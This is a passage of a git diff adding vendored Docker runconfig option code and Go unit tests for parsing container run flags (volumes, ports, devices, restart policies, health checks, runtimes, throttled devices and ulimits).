should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + } + + // Linux-specific error tests + if runtime.GOOS != "windows" { + // Just root + bindsOrVols = []string{`/`} + if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { + t.Fatalf("binds %v should have failed", bindsOrVols) + } + if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { + t.Fatalf("volume %v should have failed", bindsOrVols) + } + + // A single volume that looks like a bind mount passed in Volumes. + // This should be handled as a bind mount, not a volume. + vols := []string{`/foo:/bar`} + if config, hostConfig, err := callDecodeContainerConfig(vols, nil); err != nil { + t.Fatal("Volume /foo:/bar should have succeeded as a volume name") + } else if hostConfig.Binds != nil { + t.Fatalf("Error parsing volume flags, /foo:/bar should not mount-bind anything. Received %v", hostConfig.Binds) + } else if _, exists := config.Volumes[vols[0]]; !exists { + t.Fatalf("Error parsing volume flags, /foo:/bar is missing from volumes. Received %v", config.Volumes) + } + + } +} + +// callDecodeContainerConfig is a utility function used by TestDecodeContainerConfigVolumes +// to call DecodeContainerConfig. It effectively does what a client would +// do when calling the daemon by constructing a JSON stream of a +// ContainerConfigWrapper which is populated by the set of volume specs +// passed into it. It returns a config and a hostconfig which can be +// validated to ensure DecodeContainerConfig has manipulated the structures +// correctly. +func callDecodeContainerConfig(volumes []string, binds []string) (*container.Config, *container.HostConfig, error) { + var ( + b []byte + err error + c *container.Config + h *container.HostConfig + ) + w := runconfig.ContainerConfigWrapper{ + Config: &container.Config{ + Volumes: map[string]struct{}{}, + }, + HostConfig: &container.HostConfig{ + NetworkMode: "none", + Binds: binds, + }, + } + for _, v := range volumes { + w.Config.Volumes[v] = struct{}{} + } + if b, err = json.Marshal(w); err != nil { + return nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) + } + c, h, _, err = runconfig.DecodeContainerConfig(bytes.NewReader(b)) + if err != nil { + return nil, nil, fmt.Errorf("Error parsing %s: %v", string(b), err) + } + if c == nil || h == nil { + return nil, nil, fmt.Errorf("Empty config or hostconfig") + } + + return c, h, err +} + +// check if (a == c && b == d) || (a == d && b == c) +// because maps are randomized +func compareRandomizedStrings(a, b, c, d string) error { + if a == c && b == d { + return nil + } + if a == d && b == c { + return nil + } + return fmt.Errorf("strings don't match") +} + +// setupPlatformVolume takes two arrays of volume specs - a Unix style +// spec and a Windows style spec. Depending on the platform being unit tested, +// it returns one of them, along with a volume string that would be passed +// on the docker CLI (eg -v /bar -v /foo). +func setupPlatformVolume(u []string, w []string) ([]string, string) { + var a []string + if runtime.GOOS == "windows" { + a = w + } else { + a = u + } + s := "" + for _, v := range a { + s = s + "-v " + v + " " + } + return a, s +} + +// Simple parse with MacAddress validation +func TestParseWithMacAddress(t *testing.T) { + invalidMacAddress := "--mac-address=invalidMacAddress" + validMacAddress := "--mac-address=92:d0:c6:0a:29:33" + if _, _, _, err := parseRun([]string{invalidMacAddress, "img", "cmd"}); err != nil && err.Error() != "invalidMacAddress is not a valid mac address" { + t.Fatalf("Expected an error with %v mac-address, got %v", invalidMacAddress, err) + } + if config, _ := mustParse(t, validMacAddress); config.MacAddress != "92:d0:c6:0a:29:33" { + t.Fatalf("Expected the config to have '92:d0:c6:0a:29:33' as MacAddress, got '%v'", config.MacAddress) + } +} + +func TestParseWithMemory(t *testing.T) { + invalidMemory := "--memory=invalid" + validMemory := "--memory=1G" + if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err != nil && err.Error() != "invalid size: 'invalid'" { + t.Fatalf("Expected an error with '%v' Memory, got '%v'", invalidMemory, err) + } + if _, hostconfig := mustParse(t, validMemory); hostconfig.Memory != 1073741824 { + t.Fatalf("Expected the config to have '1G' as Memory, got '%v'", hostconfig.Memory) + } +} + +func TestParseWithMemorySwap(t *testing.T) { + invalidMemory := "--memory-swap=invalid" + validMemory := "--memory-swap=1G" + anotherValidMemory := "--memory-swap=-1" + if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err == nil || err.Error() != "invalid size: 'invalid'" { + t.Fatalf("Expected an error with '%v' MemorySwap, got '%v'", invalidMemory, err) + } + if _, hostconfig := mustParse(t, validMemory); hostconfig.MemorySwap != 1073741824 { + t.Fatalf("Expected the config to have '1073741824' as MemorySwap, got '%v'", hostconfig.MemorySwap) + } + if _, hostconfig := mustParse(t, anotherValidMemory); hostconfig.MemorySwap != -1 { + t.Fatalf("Expected the config to have '-1' as MemorySwap, got '%v'", hostconfig.MemorySwap) + } +} + +func TestParseHostname(t *testing.T) { + validHostnames := map[string]string{ + "hostname": "hostname", + "host-name": "host-name", + "hostname123": "hostname123", + "123hostname": "123hostname", + "hostname-of-63-bytes-long-should-be-valid-and-without-any-error": "hostname-of-63-bytes-long-should-be-valid-and-without-any-error", + } + hostnameWithDomain := "--hostname=hostname.domainname" + hostnameWithDomainTld := "--hostname=hostname.domainname.tld" + for hostname, expectedHostname := range validHostnames { + if config, _ := mustParse(t, fmt.Sprintf("--hostname=%s", hostname)); config.Hostname != expectedHostname { + t.Fatalf("Expected the config to have 'hostname' as hostname, got '%v'", config.Hostname) + } + } + if config, _ := mustParse(t, hostnameWithDomain); config.Hostname != "hostname.domainname" && config.Domainname != "" { + t.Fatalf("Expected the config to have 'hostname' as hostname.domainname, got '%v'", config.Hostname) + } + if config, _ := mustParse(t, hostnameWithDomainTld); config.Hostname != "hostname.domainname.tld" && config.Domainname != "" { + t.Fatalf("Expected the config to have 'hostname' as hostname.domainname.tld, got '%v'", config.Hostname) + } +} + +func TestParseWithExpose(t *testing.T) { + invalids := map[string]string{ + ":": "invalid port format for --expose: :", + "8080:9090": "invalid port format for --expose: 8080:9090", + "/tcp": "invalid range format for --expose: /tcp, error: Empty string specified for ports.", + "/udp": "invalid range format for --expose: /udp, error: Empty string specified for ports.", + "NaN/tcp": `invalid range format for --expose: NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, + "NaN-NaN/tcp": `invalid range format for --expose: NaN-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, + "8080-NaN/tcp": `invalid range format for --expose: 8080-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, + "1234567890-8080/tcp": `invalid range format for --expose: 1234567890-8080/tcp, error: strconv.ParseUint: parsing "1234567890": value out of range`, + } + valids := map[string][]nat.Port{ + "8080/tcp": {"8080/tcp"}, + "8080/udp": {"8080/udp"}, + "8080/ncp": {"8080/ncp"}, + "8080-8080/udp": {"8080/udp"}, + "8080-8082/tcp": {"8080/tcp", "8081/tcp", "8082/tcp"}, + } + for expose, expectedError := range invalids { + if _, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}); err == nil || err.Error() != expectedError { + t.Fatalf("Expected error '%v' with '--expose=%v', got '%v'", expectedError, expose, err) + } + } + for expose, exposedPorts := range valids { + config, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.ExposedPorts) != len(exposedPorts) { + t.Fatalf("Expected %v exposed port, got %v", len(exposedPorts), len(config.ExposedPorts)) + } + for _, port := range exposedPorts { + if _, ok := config.ExposedPorts[port]; !ok { + t.Fatalf("Expected %v, got %v", exposedPorts, config.ExposedPorts) + } + } + } + // Merge with actual published port + config, _, _, err := parseRun([]string{"--publish=80", "--expose=80-81/tcp", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.ExposedPorts) != 2 { + t.Fatalf("Expected 2 exposed ports, got %v", config.ExposedPorts) + } + ports := []nat.Port{"80/tcp", "81/tcp"} + for _, port := range ports { + if _, ok := config.ExposedPorts[port]; !ok { + t.Fatalf("Expected %v, got %v", ports, config.ExposedPorts) + } + } +} + +func TestParseDevice(t *testing.T) { + valids := map[string]container.DeviceMapping{ + "/dev/snd": { + PathOnHost: "/dev/snd", + PathInContainer: "/dev/snd", + CgroupPermissions: "rwm", + }, + "/dev/snd:rw": { + PathOnHost: "/dev/snd", + PathInContainer: "/dev/snd", + CgroupPermissions: "rw", + }, + "/dev/snd:/something": { + PathOnHost: "/dev/snd", + PathInContainer: "/something", + CgroupPermissions: "rwm", + }, + "/dev/snd:/something:rw": { + PathOnHost: "/dev/snd", + PathInContainer: "/something", + CgroupPermissions: "rw", + }, + } + for device, deviceMapping := range valids { + _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--device=%v", device), "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(hostconfig.Devices) != 1 { + t.Fatalf("Expected 1 devices, got %v", hostconfig.Devices) + } + if hostconfig.Devices[0] != deviceMapping { + t.Fatalf("Expected %v, got %v", deviceMapping, hostconfig.Devices) + } + } + +} + +func TestParseModes(t *testing.T) { + // ipc ko + if _, _, _, err := parseRun([]string{"--ipc=container:", "img", "cmd"}); err == nil || err.Error() != "--ipc: invalid IPC mode" { + t.Fatalf("Expected an error with message '--ipc: invalid IPC mode', got %v", err) + } + // ipc ok + _, hostconfig, _, err := parseRun([]string{"--ipc=host", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if !hostconfig.IpcMode.Valid() { + t.Fatalf("Expected a valid IpcMode, got %v", hostconfig.IpcMode) + } + // pid ko + if _, _, _, err := parseRun([]string{"--pid=container:", "img", "cmd"}); err == nil || err.Error() != "--pid: invalid PID mode" { + t.Fatalf("Expected an error with message '--pid: invalid PID mode', got %v", err) + } + // pid ok + _, hostconfig, _, err = parseRun([]string{"--pid=host", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if !hostconfig.PidMode.Valid() { + t.Fatalf("Expected a valid PidMode, got %v", hostconfig.PidMode) + } + // uts ko + if _, _, _, err := parseRun([]string{"--uts=container:", "img", "cmd"}); err == nil || err.Error() != "--uts: invalid UTS mode" { + t.Fatalf("Expected an error with message '--uts: invalid UTS mode', got %v", err) + } + // uts ok + _, hostconfig, _, err = parseRun([]string{"--uts=host", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if !hostconfig.UTSMode.Valid() { + t.Fatalf("Expected a valid UTSMode, got %v", hostconfig.UTSMode) + } + // shm-size ko + if _, _, _, err = parseRun([]string{"--shm-size=a128m", "img", "cmd"}); err == nil || err.Error() != "invalid size: 'a128m'" { + t.Fatalf("Expected an error with message 'invalid size: a128m', got %v", err) + } + // shm-size ok + _, hostconfig, _, err = parseRun([]string{"--shm-size=128m", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if hostconfig.ShmSize != 134217728 { + t.Fatalf("Expected a valid ShmSize, got %d", hostconfig.ShmSize) + } +} + +func TestParseRestartPolicy(t *testing.T) { + invalids := map[string]string{ + "always:2:3": "invalid restart policy format", + "on-failure:invalid": "maximum retry count must be an integer", + } + valids := map[string]container.RestartPolicy{ + "": {}, + "always": { + Name: "always", + MaximumRetryCount: 0, + }, + "on-failure:1": { + Name: "on-failure", + MaximumRetryCount: 1, + }, + } + for restart, expectedError := range invalids { + if _, _, _, err := parseRun([]string{fmt.Sprintf("--restart=%s", restart), "img", "cmd"}); err == nil || err.Error() != expectedError { + t.Fatalf("Expected an error with message '%v' for %v, got %v", expectedError, restart, err) + } + } + for restart, expected := range valids { + _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--restart=%v", restart), "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if hostconfig.RestartPolicy != expected { + t.Fatalf("Expected %v, got %v", expected, hostconfig.RestartPolicy) + } + } +} + +func TestParseHealth(t *testing.T) { + checkOk := func(args ...string) *container.HealthConfig { + config, _, _, err := parseRun(args) + if err != nil { + t.Fatalf("%#v: %v", args, err) + } + return config.Healthcheck + } + checkError := func(expected string, args ...string) { + config, _, _, err := parseRun(args) + if err == nil { + t.Fatalf("Expected error, but got %#v", config) + } + if err.Error() != expected { + t.Fatalf("Expected %#v, got %#v", expected, err) + } + } + health := checkOk("--no-healthcheck", "img", "cmd") + if health == nil || len(health.Test) != 1 || health.Test[0] != "NONE" { + t.Fatalf("--no-healthcheck failed: %#v", health) + } + + health = checkOk("--health-cmd=/check.sh -q", "img", "cmd") + if len(health.Test) != 2 || health.Test[0] != "CMD-SHELL" || health.Test[1] != "/check.sh -q" { + t.Fatalf("--health-cmd: got %#v", health.Test) + } + if health.Timeout != 0 { + t.Fatalf("--health-cmd: timeout = %f", health.Timeout) + } + + checkError("--no-healthcheck conflicts with --health-* options", + "--no-healthcheck", "--health-cmd=/check.sh -q", "img", "cmd") + + health = checkOk("--health-timeout=2s", "--health-retries=3", "--health-interval=4.5s", "img", "cmd") + if health.Timeout != 2*time.Second || health.Retries != 3 || health.Interval != 4500*time.Millisecond { + t.Fatalf("--health-*: got %#v", health) + } +} + +func TestParseLoggingOpts(t *testing.T) { + // logging opts ko + if _, _, _, err := parseRun([]string{"--log-driver=none", "--log-opt=anything", "img", "cmd"}); err == nil || err.Error() != "invalid logging opts for driver none" { + t.Fatalf("Expected an error with message 'invalid logging opts for driver none', got %v", err) + } + // logging opts ok + _, hostconfig, _, err := parseRun([]string{"--log-driver=syslog", "--log-opt=something", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if hostconfig.LogConfig.Type != "syslog" || len(hostconfig.LogConfig.Config) != 1 { + t.Fatalf("Expected a 'syslog' LogConfig with one config, got %v", hostconfig.RestartPolicy) + } +} + +func TestParseEnvfileVariables(t *testing.T) { + e := "open nonexistent: no such file or directory" + if runtime.GOOS == "windows" { + e = "open nonexistent: The system cannot find the file specified." + } + // env ko + if _, _, _, err := parseRun([]string{"--env-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } + // env ok + config, _, _, err := parseRun([]string{"--env-file=fixtures/valid.env", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Env) != 1 || config.Env[0] != "ENV1=value1" { + t.Fatalf("Expected a config with [ENV1=value1], got %v", config.Env) + } + config, _, _, err = parseRun([]string{"--env-file=fixtures/valid.env", "--env=ENV2=value2", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Env) != 2 || config.Env[0] != "ENV1=value1" || config.Env[1] != "ENV2=value2" { + t.Fatalf("Expected a config with [ENV1=value1 ENV2=value2], got %v", config.Env) + } +} + +func TestParseEnvfileVariablesWithBOMUnicode(t *testing.T) { + // UTF8 with BOM + config, _, _, err := parseRun([]string{"--env-file=fixtures/utf8.env", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + env := []string{"FOO=BAR", "HELLO=" + string([]byte{0xe6, 0x82, 0xa8, 0xe5, 0xa5, 0xbd}), "BAR=FOO"} + if len(config.Env) != len(env) { + t.Fatalf("Expected a config with %d env variables, got %v: %v", len(env), len(config.Env), config.Env) + } + for i, v := range env { + if config.Env[i] != v { + t.Fatalf("Expected a config with [%s], got %v", v, []byte(config.Env[i])) + } + } + + // UTF16 with BOM + e := "contains invalid utf8 bytes at line" + if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } + // UTF16BE with BOM + if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16be.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } +} + +func TestParseLabelfileVariables(t *testing.T) { + e := "open nonexistent: no such file or directory" + if runtime.GOOS == "windows" { + e = "open nonexistent: The system cannot find the file specified." + } + // label ko + if _, _, _, err := parseRun([]string{"--label-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { + t.Fatalf("Expected an error with message '%s', got %v", e, err) + } + // label ok + config, _, _, err := parseRun([]string{"--label-file=fixtures/valid.label", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Labels) != 1 || config.Labels["LABEL1"] != "value1" { + t.Fatalf("Expected a config with [LABEL1:value1], got %v", config.Labels) + } + config, _, _, err = parseRun([]string{"--label-file=fixtures/valid.label", "--label=LABEL2=value2", "img", "cmd"}) + if err != nil { + t.Fatal(err) + } + if len(config.Labels) != 2 || config.Labels["LABEL1"] != "value1" || config.Labels["LABEL2"] != "value2" { + t.Fatalf("Expected a config with [LABEL1:value1 LABEL2:value2], got %v", config.Labels) + } +} + +func TestParseEntryPoint(t *testing.T) { + config, _, _, err := parseRun([]string{"--entrypoint=anything", "cmd", "img"}) + if err != nil { + t.Fatal(err) + } + if len(config.Entrypoint) != 1 && config.Entrypoint[0] != "anything" { + t.Fatalf("Expected entrypoint 'anything', got %v", config.Entrypoint) + } +} + +func TestValidateLink(t *testing.T) { + valid := []string{ + "name", + "dcdfbe62ecd0:alias", + "7a67485460b7642516a4ad82ecefe7f57d0c4916f530561b71a50a3f9c4e33da", + "angry_torvalds:linus", + } + invalid := map[string]string{ + "": "empty string specified for links", + "too:much:of:it": "bad format for links: too:much:of:it", + } + + for _, link := range valid { + if _, err := ValidateLink(link); err != nil { + t.Fatalf("ValidateLink(`%q`) should succeed: error %q", link, err) + } + } + + for link, expectedError := range invalid { + if _, err := ValidateLink(link); err == nil { + t.Fatalf("ValidateLink(`%q`) should have failed validation", link) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ValidateLink(`%q`) error should contain %q", link, expectedError) + } + } + } +} + +func TestParseLink(t *testing.T) { + name, alias, err := ParseLink("name:alias") + if err != nil { + t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "alias" { + t.Fatalf("Link alias should have been alias, got %s instead", alias) + } + // short format definition + name, alias, err = ParseLink("name") + if err != nil { + t.Fatalf("Expected not to error out on a valid name only format but got: %v", err) + } + if name != "name" { + t.Fatalf("Link name should have been name, got %s instead", name) + } + if alias != "name" { + t.Fatalf("Link alias should have been name, got %s instead", alias) + } + // empty string link definition is not allowed + if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") { + t.Fatalf("Expected error 'empty string specified for links' but got: %v", err) + } + // more than two colons are not allowed + if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") { + t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err) + } +} + +func TestValidateDevice(t *testing.T) { + valid := []string{ + "/home", + "/home:/home", + "/home:/something/else", + "/with space", + "/home:/with space", + "relative:/absolute-path", + "hostPath:/containerPath:r", + "/hostPath:/containerPath:rw", + "/hostPath:/containerPath:mrw", + } + invalid := map[string]string{ + "": "bad format for path: ", + "./": "./ is not an absolute path", + "../": "../ is not an absolute path", + "/:../": "../ is not an absolute path", + "/:path": "path is not an absolute path", + ":": "bad format for path: :", + "/tmp:": " is not an absolute path", + ":test": "bad format for path: :test", + ":/test": "bad format for path: :/test", + "tmp:": " is not an absolute path", + ":test:": "bad format for path: :test:", + "::": "bad format for path: ::", + ":::": "bad format for path: :::", + "/tmp:::": "bad format for path: /tmp:::", + ":/tmp::": "bad format for path: :/tmp::", + "path:ro": "ro is not an absolute path", + "path:rr": "rr is not an absolute path", + "a:/b:ro": "bad mode specified: ro", + "a:/b:rr": "bad mode specified: rr", + } + + for _, path := range valid { + if _, err := ValidateDevice(path); err != nil { + t.Fatalf("ValidateDevice(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range invalid { + if _, err := ValidateDevice(path); err == nil { + t.Fatalf("ValidateDevice(`%q`) should have failed validation", path) + } else { + if err.Error() != expectedError { + t.Fatalf("ValidateDevice(`%q`) error should contain %q, got %q", path, expectedError, err.Error()) + } + } + } +} + +func TestVolumeSplitN(t *testing.T) { + for _, x := range []struct { + input string + n int + expected []string + }{ + {`C:\foo:d:`, -1, []string{`C:\foo`, `d:`}}, + {`:C:\foo:d:`, -1, nil}, + {`/foo:/bar:ro`, 3, []string{`/foo`, `/bar`, `ro`}}, + {`/foo:/bar:ro`, 2, []string{`/foo`, `/bar:ro`}}, + {`C:\foo\:/foo`, -1, []string{`C:\foo\`, `/foo`}}, + + {`d:\`, -1, []string{`d:\`}}, + {`d:`, -1, []string{`d:`}}, + {`d:\path`, -1, []string{`d:\path`}}, + {`d:\path with space`, -1, []string{`d:\path with space`}}, + {`d:\pathandmode:rw`, -1, []string{`d:\pathandmode`, `rw`}}, + {`c:\:d:\`, -1, []string{`c:\`, `d:\`}}, + {`c:\windows\:d:`, -1, []string{`c:\windows\`, `d:`}}, + {`c:\windows:d:\s p a c e`, -1, []string{`c:\windows`, `d:\s p a c e`}}, + {`c:\windows:d:\s p a c e:RW`, -1, []string{`c:\windows`, `d:\s p a c e`, `RW`}}, + {`c:\program files:d:\s p a c e i n h o s t d i r`, -1, []string{`c:\program files`, `d:\s p a c e i n h o s t d i r`}}, + {`0123456789name:d:`, -1, []string{`0123456789name`, `d:`}}, + {`MiXeDcAsEnAmE:d:`, -1, []string{`MiXeDcAsEnAmE`, `d:`}}, + {`name:D:`, -1, []string{`name`, `D:`}}, + {`name:D::rW`, -1, []string{`name`, `D:`, `rW`}}, + {`name:D::RW`, -1, []string{`name`, `D:`, `RW`}}, + {`c:/:d:/forward/slashes/are/good/too`, -1, []string{`c:/`, `d:/forward/slashes/are/good/too`}}, + {`c:\Windows`, -1, []string{`c:\Windows`}}, + {`c:\Program Files (x86)`, -1, []string{`c:\Program Files (x86)`}}, + + {``, -1, nil}, + {`.`, -1, []string{`.`}}, + {`..\`, -1, []string{`..\`}}, + {`c:\:..\`, -1, []string{`c:\`, `..\`}}, + {`c:\:d:\:xyzzy`, -1, []string{`c:\`, `d:\`, `xyzzy`}}, + + // Cover directories with one-character name + {`/tmp/x/y:/foo/x/y`, -1, []string{`/tmp/x/y`, `/foo/x/y`}}, + } { + res := volumeSplitN(x.input, x.n) + if len(res) < len(x.expected) { + t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) + } + for i, e := range res { + if e != x.expected[i] { + t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) + } + } + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/runtime.go b/vendor/github.com/docker/docker/runconfig/opts/runtime.go new file mode 100644 index 0000000000..4361b3ce09 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/runtime.go @@ -0,0 +1,79 @@ +package opts + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types" +) + +// RuntimeOpt defines a map of Runtimes +type RuntimeOpt struct { + name string + stockRuntimeName string + values *map[string]types.Runtime +} + +// NewNamedRuntimeOpt creates a new RuntimeOpt +func NewNamedRuntimeOpt(name string, ref *map[string]types.Runtime, stockRuntime string) *RuntimeOpt { + if ref == nil { + ref = &map[string]types.Runtime{} + } + return &RuntimeOpt{name: name, values: ref, stockRuntimeName: stockRuntime} +} + +// Name returns the name of the NamedListOpts in the configuration. +func (o *RuntimeOpt) Name() string { + return o.name +} + +// Set validates and updates the list of Runtimes +func (o *RuntimeOpt) Set(val string) error { + parts := strings.SplitN(val, "=", 2) + if len(parts) != 2 { + return fmt.Errorf("invalid runtime argument: %s", val) + } + + parts[0] = strings.TrimSpace(parts[0]) + parts[1] = strings.TrimSpace(parts[1]) + if parts[0] == "" || parts[1] == "" { + return fmt.Errorf("invalid runtime argument: %s", val) + } + + parts[0] = strings.ToLower(parts[0]) + if parts[0] == o.stockRuntimeName { + return fmt.Errorf("runtime name '%s' is reserved", o.stockRuntimeName) + } + + if _, ok := (*o.values)[parts[0]]; ok { + return fmt.Errorf("runtime '%s' was already defined", parts[0]) + } + + (*o.values)[parts[0]] = types.Runtime{Path: parts[1]} + + return nil +} + +// String returns Runtime values as a string. +func (o *RuntimeOpt) String() string { + var out []string + for k := range *o.values { + out = append(out, k) + } + + return fmt.Sprintf("%v", out) +} + +// GetMap returns a map of Runtimes (name: path) +func (o *RuntimeOpt) GetMap() map[string]types.Runtime { + if o.values != nil { + return *o.values + } + + return map[string]types.Runtime{} +} + +// Type returns the type of the option +func (o *RuntimeOpt) Type() string { + return "runtime" +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go new file mode 100644 index 0000000000..5024324298 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go @@ -0,0 +1,111 @@ +package opts + +import ( + "fmt" + "strconv" + "strings" + + "github.com/docker/docker/api/types/blkiodev" + "github.com/docker/go-units" +) + +// ValidatorThrottleFctType defines a validator function that returns a validated struct and/or an error. +type ValidatorThrottleFctType func(val string) (*blkiodev.ThrottleDevice, error) + +// ValidateThrottleBpsDevice validates that the specified string has a valid device-rate format. +func ValidateThrottleBpsDevice(val string) (*blkiodev.ThrottleDevice, error) { + split := strings.SplitN(val, ":", 2) + if len(split) != 2 { + return nil, fmt.Errorf("bad format: %s", val) + } + if !strings.HasPrefix(split[0], "/dev/") { + return nil, fmt.Errorf("bad format for device path: %s", val) + } + rate, err := units.RAMInBytes(split[1]) + if err != nil { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) + } + if rate < 0 { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) + } + + return &blkiodev.ThrottleDevice{ + Path: split[0], + Rate: uint64(rate), + }, nil +} + +// ValidateThrottleIOpsDevice validates that the specified string has a valid device-rate format. +func ValidateThrottleIOpsDevice(val string) (*blkiodev.ThrottleDevice, error) { + split := strings.SplitN(val, ":", 2) + if len(split) != 2 { + return nil, fmt.Errorf("bad format: %s", val) + } + if !strings.HasPrefix(split[0], "/dev/") { + return nil, fmt.Errorf("bad format for device path: %s", val) + } + rate, err := strconv.ParseUint(split[1], 10, 64) + if err != nil { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. Number must be a positive integer", val) + } + if rate < 0 { + return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. Number must be a positive integer", val) + } + + return &blkiodev.ThrottleDevice{ + Path: split[0], + Rate: uint64(rate), + }, nil +} + +// ThrottledeviceOpt defines a map of ThrottleDevices +type ThrottledeviceOpt struct { + values []*blkiodev.ThrottleDevice + validator ValidatorThrottleFctType +} + +// NewThrottledeviceOpt creates a new ThrottledeviceOpt +func NewThrottledeviceOpt(validator ValidatorThrottleFctType) ThrottledeviceOpt { + values := []*blkiodev.ThrottleDevice{} + return ThrottledeviceOpt{ + values: values, + validator: validator, + } +} + +// Set validates a ThrottleDevice and sets its name as a key in ThrottledeviceOpt +func (opt *ThrottledeviceOpt) Set(val string) error { + var value *blkiodev.ThrottleDevice + if opt.validator != nil { + v, err := opt.validator(val) + if err != nil { + return err + } + value = v + } + (opt.values) = append((opt.values), value) + return nil +} + +// String returns ThrottledeviceOpt values as a string. +func (opt *ThrottledeviceOpt) String() string { + var out []string + for _, v := range opt.values { + out = append(out, v.String()) + } + + return fmt.Sprintf("%v", out) +} + +// GetList returns a slice of pointers to ThrottleDevices. +func (opt *ThrottledeviceOpt) GetList() []*blkiodev.ThrottleDevice { + var throttledevice []*blkiodev.ThrottleDevice + throttledevice = append(throttledevice, opt.values...) + + return throttledevice +} + +// Type returns the option type +func (opt *ThrottledeviceOpt) Type() string { + return "throttled-device" +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go b/vendor/github.com/docker/docker/runconfig/opts/ulimit.go new file mode 100644 index 0000000000..5adfe30851 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/ulimit.go @@ -0,0 +1,57 @@ +package opts + +import ( + "fmt" + + "github.com/docker/go-units" +) + +// UlimitOpt defines a map of Ulimits +type UlimitOpt struct { + values *map[string]*units.Ulimit +} + +// NewUlimitOpt creates a new UlimitOpt +func NewUlimitOpt(ref *map[string]*units.Ulimit) *UlimitOpt { + if ref == nil { + ref = &map[string]*units.Ulimit{} + } + return &UlimitOpt{ref} +} + +// Set validates a Ulimit and sets its name as a key in UlimitOpt +func (o *UlimitOpt) Set(val string) error { + l, err := units.ParseUlimit(val) + if err != nil { + return err + } + + (*o.values)[l.Name] = l + + return nil +} + +// String returns Ulimit values as a string. +func (o *UlimitOpt) String() string { + var out []string + for _, v := range *o.values { + out = append(out, v.String()) + } + + return fmt.Sprintf("%v", out) +} + +// GetList returns a slice of pointers to Ulimits. +func (o *UlimitOpt) GetList() []*units.Ulimit { + var ulimits []*units.Ulimit + for _, v := range *o.values { + ulimits = append(ulimits, v) + } + + return ulimits +} + +// Type returns the option type +func (o *UlimitOpt) Type() string { + return "ulimit" +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go b/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go new file mode 100644 index 0000000000..0aa3facdfb --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go @@ -0,0 +1,42 @@ +package opts + +import ( + "testing" + + "github.com/docker/go-units" +) + +func TestUlimitOpt(t *testing.T) { + ulimitMap := map[string]*units.Ulimit{ + "nofile": {"nofile", 1024, 512}, + } + + ulimitOpt := NewUlimitOpt(&ulimitMap) + + expected := "[nofile=512:1024]" + if ulimitOpt.String() != expected { + t.Fatalf("Expected %v, got %v", expected, ulimitOpt) + } + + // Valid ulimit append to opts + if err := ulimitOpt.Set("core=1024:1024"); err != nil { + t.Fatal(err) + } + + // Invalid ulimit type returns an error and do not append to opts + if err := ulimitOpt.Set("notavalidtype=1024:1024"); err == nil { + t.Fatalf("Expected error on invalid ulimit type") + } + expected = "[nofile=512:1024 core=1024:1024]" + expected2 := "[core=1024:1024 nofile=512:1024]" + result := ulimitOpt.String() + if result != expected && result != expected2 { + 